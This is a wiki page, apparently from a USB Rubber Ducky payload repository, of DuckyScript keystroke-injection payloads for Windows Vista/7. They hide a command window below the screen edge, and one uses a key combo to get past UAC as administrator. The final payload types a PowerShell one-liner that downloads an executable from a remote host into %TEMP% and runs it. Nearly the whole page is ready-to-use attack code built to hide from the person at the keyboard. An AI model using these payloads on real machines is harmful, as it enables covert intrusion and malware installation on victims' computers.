Payload hide cmd window - a3rd/USB-Rubber-Ducky GitHub Wiki
The following is an example of how to hide the command window below the bottom of the screen while typing in commands. The window movement part of the script can also be used on any other window. CMD.exe is also run with some command line flags for changing the appearance of the window to make it harder to view, and also a flag that turns on delayed expansion in the command prompt which allows for variable names to be called more than once in a line with no adverse effects. Ex… SET Something = Something + Something_Else
REM Target: WINDOWS VISTA/7
REM Encoder V2.4
REM Using the run command for a broader OS base.
DELAY 3000
GUI r
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Target: WINDOWS VISTA
REM Encoder V2.4
REM Purpose: Hide cmd window script that uses a key combo to circumvent UAC limitations.
DELAY 3000
CONTROL ESCAPE
DELAY 500
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
CTRL-SHIFT ENTER
DELAY 1000
ALT C
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Target: WINDOWS VISTA/7
REM Encoder V2.4
REM Using the run command for a broader OS base.
DELAY 3000
GUI r
DELAY 1000
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER